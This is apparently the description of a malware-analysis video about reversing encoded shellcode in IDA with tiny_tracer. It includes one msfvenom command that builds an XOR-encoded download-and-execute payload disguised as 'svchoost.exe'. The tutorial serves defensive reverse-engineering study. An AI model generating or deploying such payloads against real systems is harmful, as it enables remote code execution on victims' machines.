In this video I will be showing encoded shellcode reversing in IDA with help of new feature of tiny_tracer tool.
You can see very often used methods in shellcode to resolve API function addresses via parsing TEB, PEB, Export directory structures and others…
This covers – Generating shellcode, converting shellcode to exe, IDA debugging, applying structures in IDA, using tiny_tracer, cports tool.
Generating encoded shellcode:
msfvenom.bat -p windows/download_exec EXE=”svchoost.exe” URL=”http://localhost:8080/malware.exe” -e x86/xor_dynamic -o ./shellcode.sc
Loading Type library: ntapi_win7
Add struct types: _TEB, _PEB, _PEB_LDR_DATA, LDR_DATA_TABLE_ENTRY, _IMAGE_DOS_HEADER, _IMAGE_NT_HEADERS32, _IMAGE_EXPORT_DIRECTORY
Not malicious and only for education purpose samples to download here:
shellcode2exe – https://github.com/repnz/shellcode2exe
cports – https://www.nirsoft.net/utils/cports.html
PE-bear – https://github.com/hasherezade/pe-bear-releases
tiny_tracer – https://github.com/hasherezade/tiny_tracer
metasploit – https://www.metasploit.com/download
wireshark – https://www.wireshark.org/#download
procmon – https://docs.microsoft.com/en-us/sysinternals/downloads/procmon